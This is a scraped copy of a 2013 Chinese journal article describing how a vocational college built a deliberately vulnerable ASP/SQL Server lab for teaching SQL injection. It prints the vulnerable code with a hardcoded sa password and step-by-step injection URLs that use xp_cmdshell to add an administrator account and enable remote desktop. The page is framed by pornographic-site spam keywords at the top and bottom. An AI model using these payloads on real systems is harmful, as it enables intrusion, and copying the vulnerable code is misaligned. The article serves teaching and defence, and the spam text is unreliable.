999精品在线视频,手机成人午夜在线视频,久久不卡国产精品无码,中日无码在线观看,成人av手机在线观看,日韩精品亚洲一区中文字幕,亚洲av无码人妻,四虎国产在线观看 ?

高職院校SQL注入攻擊實驗環境搭建及使用研究*

2013-07-31 20:26:20曾煌存
職業教育研究 2013年12期
關鍵詞:頁面網絡安全數據庫

曾煌存

(廣東外語藝術職業學院 廣東 廣州 510640)

高職院校SQL注入攻擊實驗環境搭建及使用研究*

曾煌存

(廣東外語藝術職業學院 廣東 廣州 510640)

SQL注入攻擊是黑客攻擊最常用的手段之一,其危害極大。在高職院校的網絡安全課中,使學生掌握SQL注入攻擊和相應的防范措施是一個教學難點。如果能夠搭建一個簡單的具有SQL注入漏洞的實驗環境,讓學生在這個實驗環境中進行模擬攻擊,對于學生更好地掌握SQL注入攻擊的原理和具體實施步驟具有很大的好處,進而能讓學生更好地掌握相應的安全防范措施。總結SQL注入攻擊實驗環境搭建及使用實踐,旨在對高職院校的SQL注入攻擊與防范實訓教學起到一定的促進作用。

高職院校;SQL注入攻擊;實驗環境;網絡安全

研究意義

SQL注入攻擊是黑客攻擊最常用的手段之一,其危害極大。一些不具備很多網絡安全技術的“腳本小子”,使用一些傻瓜式SQL注入攻擊工具,就可能攻陷網站,進而控制服務器。

高職院校的 《網絡安全與防范》課程,具有培養學生掌握較高網絡安全防范技能的任務。因此,必須使學生掌握好SQL注入攻擊的防范措施。而為了真正掌握SQL注入攻擊的防范措施,又必須透徹理解SQL注入攻擊的原理和具體實施步驟。經驗表明,這是一個教學難點,因為它需要精心構造SQL語句,來完成信息的查詢、語句的執行等。

我們開展了一項教學改革,旨在提高《網絡安全與防范》課程的教學效果。該教學改革中的一項內容,就是研究如何更好地開展SQL注入攻擊的教學。我們認為,如果能夠搭建一個簡單的具有SQL注入漏洞的動態網站,讓學生對這個網站進行模擬攻擊,對于學生更好地掌握SQL注入攻擊的原理和具體實施步驟具有很大好處,也能讓他們更好地掌握相應的安全防范措施。

SQL注入攻擊實驗環境的搭建

我們使用 VMware WorkStation虛擬機軟件安裝了兩臺虛擬機,一臺虛擬機安裝的是Windows Server 2003操作系統,用于模擬被攻擊的服務器,IP 地址為192.168.248.132;另一臺虛擬機安裝的是Windows XP操作系統,用于模擬黑客使用的攻擊機,IP地址為 192.168.248.133。 在 Windows Server 2003虛擬機上,搭建了一個使用ASP+SQL Server 2000開發的簡單的動態網站。我們設計該動態網站的思路是:該網站具有SQL注入漏洞,能滿足SQL注入攻擊的實驗要求;該網站應該盡量簡單,以便于學生理解、分析和掌握。

按照以上設計思路,我們開發了一個簡單的名為testweb的動態網站。該動態網站需要訪問一個名為testweb的數據庫,該數據庫包含一個表:tblNews。tblNews用來保存新聞的標題和內容,初始時在這個表中輸入了一些測試用的數據。它的具體結構如表1所示。

表1 tblNews表包含的測試數據結構表

該網站包括以下三個頁面:conn.asp、news.asp、displayNews.asp。其中 conn.asp用于保存與 SQL Server 2000數據庫服務器的連接信息;news.asp用于讀取數據庫中的新聞記錄,顯示所有新聞的標題,并且將這些標題以超鏈接的形式顯示。當單擊某個新聞的標題后,即可以進入形如displayNews. asp?id=xxx的頁面,看到新聞的具體內容(其中“xxx”表示某條新聞在tblNews表中ID字段的值)。設置該網站的默認頁面為news.asp。

conn.asp的代碼如下所示:

<%

ConstSqlDatabaseName= " testweb"

Const SqlPassword = " michaeljordan"

Const SqlUsername="sa"

Const SqlLocalName="(local)"

dim ConnStr

ConnStr = "Provider = Sqloledb;User ID = " & SqlUsername&";Password="& SqlPassword&";Initial Catalog=" & SqlDatabaseName & ";Data Source="&SqlLocalName&";"

news.asp的代碼如下所示:

<!--#include file="conn.asp" -->

<%

Dim conn

Set conn=Server.CreateObject("ADODB.Connection")

conn.open ConnStr

dim strSql

strSql = "select * from tblNews"

dim rs

set rs=conn.Execute(strSql)

dim newsID

response.Write("<html>")

response.Write("<body>")

response.Write("<table>")

while not rs.EOF

response.Write("<tr>")

response.Write("<td>")

newsID=rs("ID")

response.Write("<a href='displayNews.asp?id="&newsID&" '>"&rs("title")&"</a>")

response.Write("</td>")

response.Write("</tr>")

rs.MoveNext

wend

response.Write("</table>")

response.Write("</body>")

response.Write("</html>")

rs.close()

conn.close

set rs=nothing

set conn=nothing

%>

displayNews.asp的代碼如下所示:

<!--#include file="conn.asp" -->

<%

Dim conn

Set conn=Server.CreateObject("ADODB.Connection")

conn.open ConnStr

dim newsID

newsID=request("id")

dim strSql

strSql="select*from tblNews where ID="&newsID

dim rs

set rs=conn.Execute(strSql)

response.Write(rs("content"))

rs.close()

conn.close

set rs=nothing

set conn=nothing

%

從以上三個頁面的具體代碼可以看出,我們所設計的動態網站具有簡單,易于理解、分析和掌握的優點。

同時頁面 displayNews.asp有SQL注入漏洞,可以滿足SQL注入攻擊的實訓需要,其具有SQL注入漏洞的具體語句為:strSql="select *from tblNewswhereID="& newsID,該語句根據某條新聞的ID查詢tblNews表的內容。我們可以在形如displayNews.asp?id=xxx的地址后面加入精心構造的語句,從而執行特定的SQL語句,控制服務器。

SQL注入攻擊實驗環境的使用

如上所述,我們開發的動態網站testweb具有SQL注入漏洞,下面我們通過具體的入侵步驟來展示該SQL注入攻擊實驗環境的使用。(以下攻擊步驟參考了相關網絡安全書籍的內容。)

(一)判斷網站是否有SQL注入漏洞

可以通過在displayNews.asp? id=1后加上 “’”、“and 1=1”和“and 1=2”等方法來判斷網站是否有SQL注入漏洞。如在地址欄輸入 :http://192.168.248.132/testweb/ displayNews.asp?id=1’ (1)

頁面返回如下錯誤信息:

MicrosoftOLE DB Provider for SQL Server錯誤 '80040e14'

字符串 ''之前有未閉合的引號。

/testweb/displayNews.asp,行 13

從以上提示信息可以看出,數據庫服務器為SQL Server。(1)的原理是:正常的SQL語句為select *from tblNews whereID=1,而(1)導致SQL語句成為:select* from tblNews where ID=1’,這樣會使得單引號沒有閉合而出錯。

在地址欄輸入:http://192.168. 248.132/testweb/displayNews.asp? id=1 and 1=1 (2)

返回正常頁面。而在地址欄輸入:http://192.168.248.132/testweb/displayNews.asp?id=1 and 1=2(3)

返回的錯誤信息是:

ADODB.Field錯誤'80020009'

BOF或 EOF中有一個是“真”,或者當前的記錄已被刪除,所需的操作要求一個當前的記錄。

/testweb/displayNews.asp,行 0

(2)導致 SQL語句成為:select*from tblNews where ID=1 and 1=1,因為1=1為永真式,所以不影響原來的查詢結果,返回正常頁面。而(3)導致SQL語句成為:select*from tblNews where ID=1 and 1=2,因為1=2為永假式,所以查詢結果為空,而程序中沒有對此進行處理,所以導致出現錯誤提示信息。

通過以上測試,可以明確地知道網站存在SQL注入漏洞,而且數據庫服務器為SQL Server。

(二)查找是否有xp_cmdshell擴展存儲過程

在地址欄輸入:http://192.168. 248.132/testweb/displayNews.asp?id= 1 and exists(select*from master. dbo.sysobjects where name=’xp_ cmdshell’)

頁面返回正常,從而知道master.dbo.sysobjects表中存在擴展過程 xp_cmdshell。通過執行xp_cmdshell存儲過程可以實現添加用戶、將用戶添加到管理員組、開啟遠程終端連接等許多操作。

(三)通過xp_cmdshell添加系統管理員賬戶

在地址欄輸入:http://192.168. 248.132/testweb/displayNews.asp?id= 1;exec master..xp_cmdshell‘net user test test/add’ (4)

頁面返回正常。執行該語句后,可以添加一個名為test,密碼也為test的賬戶。(4)的原理是:通過xp_cmdshell擴展存儲過程,執行net user命令,實現添加賬戶的操作。

在地址欄輸入:http://192.168. 248.132/testweb/displayNews.asp?id= 1;exec master..xp_cmdshell‘net localgroup administrators test/add’

頁面返回正常。執行該語句后,可以將賬戶test添加到系統管理員組。

(四)開啟目標計算機的遠程終端連接

在地址欄輸入:http://192.168. 248.132/testweb/displayNews.asp?id= 1;exec master..xp_cmdshell‘reg add“HKLMSystemCurrentControl-SetControlTerminal Server”/v fDeny TSConnections/t RE G_DWORD/d 0/f’ (5)

頁面返回正常。執行完后,可以開啟目標計算機的遠程終端連接。(5)的原理是:通過 xp_cmdshell擴展存儲過程,執行reg add語句,完成修改注冊表,開啟遠程終端連接的操作。執行完以上步驟之后,即可以使用新建的test賬號遠程登錄目標計算機192.168.248.132。

討論

為了使學生掌握SQL注入攻擊的原理、具體實施步驟和相應的防范措施,必須搭建實驗環境讓他們演練SQL注入攻擊的實施步驟。為此,我們搭建了一個ASP+SQL Server 2000環境下的SQL Server注入攻擊實驗環境。我們沒有使用Dvbbs等現成的動態網站,因為這些動態網站功能較齊全,但代碼很復雜,不利于初學者理解、分析和掌握。我們設計的動態網站具有簡單,易于學生理解、分析和掌握的優點。我們演示了在該實驗環境中進行SQL注入攻擊,判斷是否存在SQL注入漏洞,判斷數據庫服務器是否支持xp_cmdshell擴展過程,使用xp_cmdshell添加系統管理員賬號、開啟遠程終端連接、使用攻擊機遠程登錄目標計算機等操作。這表明使用我們搭建的簡單的SQL注入攻擊實驗環境,可以方便地進行SQL注入攻擊演練。這對提高學生的學習興趣,掌握SQL注入攻擊的原理和具體的實施步驟,提高網絡安全防護意識等都具有很大的好處。

同時,利用該實驗環境,或者對該實驗環境稍微進行擴展,我們還可以進行更多的SQL注入攻擊演練,如猜解數據庫、表、字段的數目、字段的名稱、字段的內容等等。

我們的教學經驗表明,通過使用這個簡單的實驗環境,教學效果能得到明顯的提升。

[1]肖遙.大中型網絡入侵要案直擊與防御[M].北京:電子工業出版社,2011.

[2]朱錫華,劉月鏵,侯偉.暗戰亮劍——黑客滲透與防御全程實錄 [M].北京:人民郵電出版社,2010.

[3]武新華,陳艷艷,王英英.矛與盾:黑客攻防與腳本編程[M].北京:機械工業出版社,2010.

G712

A

1672-5727(2013)12-0168-03

曾煌存,碩士,廣東外語藝術職業學院講師,研究方向為網絡安全技術。

廣東外語藝術職業學院2010年度院級科研課題《〈網絡安全與防范〉課程改革的研究》(課題編號:2010G15)

猜你喜歡
頁面網絡安全數據庫
大狗熊在睡覺
刷新生活的頁面
保健醫苑(2022年1期)2022-08-30 08:39:14
網絡安全
網絡安全人才培養應“實戰化”
上網時如何注意網絡安全?
數據庫
財經(2017年2期)2017-03-10 14:35:35
數據庫
財經(2016年15期)2016-06-03 07:38:02
數據庫
財經(2016年3期)2016-03-07 07:44:46
數據庫
財經(2016年6期)2016-02-24 07:41:51
我國擬制定網絡安全法
聲屏世界(2015年7期)2015-02-28 15:20:13
主站蜘蛛池模板: 国产哺乳奶水91在线播放| 欧美中文字幕在线播放| 国产一区二区三区精品欧美日韩| 国产专区综合另类日韩一区| 亚洲无码视频一区二区三区 | 欧美区日韩区| 99在线国产| 欧美在线视频不卡| 91精品福利自产拍在线观看| 国产成人三级| 91青青视频| 55夜色66夜色国产精品视频| 亚洲日韩精品无码专区| 欧美黄网站免费观看| 91无码人妻精品一区二区蜜桃| 亚洲天堂久久久| 国模视频一区二区| 国产久操视频| 国产最爽的乱婬视频国语对白| 麻豆精品久久久久久久99蜜桃| 亚洲精品视频免费| 精品福利网| 亚洲看片网| 天天做天天爱夜夜爽毛片毛片| 强乱中文字幕在线播放不卡| 四虎成人免费毛片| 亚洲一区精品视频在线| 欧美日韩综合网| 伊人成人在线视频| 精品伊人久久久久7777人| 99热国产在线精品99| 99久久精品国产综合婷婷| 欧美视频在线第一页| 亚洲精品欧美重口| 久久精品人人做人人爽电影蜜月| 国产丝袜啪啪| 亚洲天堂精品在线| 国产91视频免费| 日韩欧美亚洲国产成人综合| 久久网欧美| 黄色片中文字幕| 大香伊人久久| V一区无码内射国产| 亚洲天堂免费| av一区二区三区高清久久| 成人毛片免费在线观看| 欧美亚洲第一页| 国产欧美又粗又猛又爽老| 国产成人精品无码一区二| 国产精品30p| 亚洲午夜18| 亚洲精品国产精品乱码不卞| 国产一区在线观看无码| 欧美日韩国产在线观看一区二区三区| 国产在线观看99| 99re66精品视频在线观看| 欧美一区福利| 国产成人亚洲精品蜜芽影院| 国产导航在线| 欧美三級片黃色三級片黃色1| 亚洲精品在线91| 成人免费视频一区| 91久久夜色精品国产网站| aaa国产一级毛片| 国内老司机精品视频在线播出| 久久国产精品电影| 97青草最新免费精品视频| 一本大道视频精品人妻| 国产精品手机在线播放| 国产精品尤物在线| 91视频区| 国产麻豆va精品视频| 欧美一区国产| 毛片最新网址| 少妇精品久久久一区二区三区| 欧美久久网| 免费国产高清精品一区在线| 国产成人91精品免费网址在线| 欧美成人日韩| 久久公开视频| 麻豆精品在线播放| 中文字幕在线观|